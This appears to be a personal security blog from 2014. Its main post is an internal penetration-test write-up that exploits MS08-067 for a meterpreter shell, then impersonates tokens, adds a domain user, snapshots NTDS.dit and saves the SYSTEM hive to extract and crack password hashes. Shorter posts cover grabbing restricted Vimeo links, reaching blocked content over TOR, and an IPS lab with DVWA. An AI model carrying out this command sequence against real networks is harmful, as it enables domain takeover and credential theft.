Friday, October 24, 2014


This post is about an Internal Vulnerability Assessment and Penetration Testing for an Enterprise. Every time I do similar project thought of creating a post for the same for my own reference... At last now is the time for the same....
Yes.. More than 1500 Users ...
More than 100 Servers...
Routers ...

My favorite fingering printing command for a Windows Environment --
nmap -p445 --script=smb-os-discovery

Ran a Nessus for Desktop range of IP address - Surprisingly all of them are shown as good ! Except RDP MiTM, SSL and SMB signing. !

Continued the Nessus to Server Ranges at Head quarter's -- Same result ! !

Continued the Nessus to Servers at Branch offices ....

Except one 2003 Server - all others are shown Same !!!

There comes the God's last fingerprint - what is that Critical Red Color - Yes it is the very old largely exploited and demonstrated same peace of bug for evergreen  Microsoft - MS08-067!

No more explanation required here at all - Yes there comes the first reverse metapreter shell !

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available

Impersonation Tokens Available

meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
 meterpreter > getuid
Server username:
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


There comes a user from the Domain. Next created a user on the Domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily the backupuser user was having privilege to create a user on ADC and add him to the domain admins group, etc.

Connected to the Primary Domain Controller with RDP !!
At Command :-
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dt file from

Created a a copy of System hive from Registry 
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded the same file too..

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used for extracting usernames and hashes -system pentest.system -ntds ntds.dit LOCAL

The resulted file was having more than 3000 lines !!!
crack station password list was able to get up to 50 passwords for half of the hashes and 20% of the users are using same password !
***Cracking the hashes are not allowed in all organizations- so make sure before cracking the passwords that this action is not denied by their policy**

Thursday, October 2, 2014


I came across a situation where I have a valid video link of vimeo but vimeo will not allow that to view online !

Rest explained below in pictures ..

First when I tried to access it on browser it did not worked !

Then I pasted the link in

I was easily able to download the video :D

**Contents hidden due to privacy issues ...

How do I got the links ?

It was from a web site I just saved the source of the site and ran the following command from linux to get the vimeo links

#grep vimeo vimeo.txt  | awk -F"src=" '{print $2}' | awk -F "\" frame" '{print $1}' | awk -F "\"" '{print $2}'

Tuesday, September 30, 2014


Just a snap about blocked content [by Organization/ISP/Govt./Country/etc.] download on Kali using TOR network.

Blocked Contents
Tails Linux

Monday, September 29, 2014

IBM Security Network Protection

IBM Security Network Protection (IPS/IDS)

Downloaded the following from IBM site.

1. VMware image of the IBM Security Network Protection (XGS) Virtual Appliance for Demo.
2.  30 day license for all features, functionality and updates.
3. Demo Setup Guide for ISNP (XGS) Virtual Appliance.

VM settings for  IBM Security Network Protection

Custom Interface /dev/vmnet4 is crucial in this configuration as it works in bridge sniffing mode.

 VM settings for DVWA (live CD)

DVWA is accessing through IPS/IDS bridge.

Sample application access monitoring and blocked URL.

 Event Log entry created 

URLs accessed for file access IPS entry :-